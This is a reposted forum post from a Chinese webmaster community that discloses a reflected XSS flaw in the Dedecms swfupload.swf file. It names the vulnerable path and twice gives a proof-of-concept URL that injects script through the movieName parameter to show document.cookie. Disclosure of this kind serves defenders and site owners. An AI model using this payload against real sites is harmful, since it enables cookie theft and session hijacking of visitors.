承接
网站维护 网站升级 数据转换 页面美化 插件二开 BUG修复
热门
插件 板摸 教程 分享 攻略 经验 电脑 服务器
分类
数据转换 网站升级 故障排查 BUG修复 页面美化 插件升级
草根吧»论坛首页 站长交流专区 站长头条 Dedecms flash反射性XSS跨站
返回列表 发新帖
查看: 915|回复: 0

Dedecms flash反射性XSS跨站

[复制链接]
小草根

6671

热度

1万

元宝

262

贡献

管理员

DZ专员
发表于 2014-9-28 10:13:37 | 显示全部楼层 |阅读模式
详细说明:

Location: /uploads/images/swfupload/swfupload.swf



漏洞文件为:http://www.dedecms.com/images/swfupload/swfupload.swf



这个flash文件存在漏洞,此文件漏洞可参考:https://nealpoole.com/blog/2012/ ... swfupload-plupload/



构造XSS攻击

http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

漏洞证明:

http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//





flash

相关帖子
回复 <

举报

返回列表 发新帖
 懒得打字嘛,点击右侧快捷回复【最新发布】   【赞助草根吧享更多权益】
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

收藏帖子 返回列表 搜索

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

小黑屋|手机版|草根吧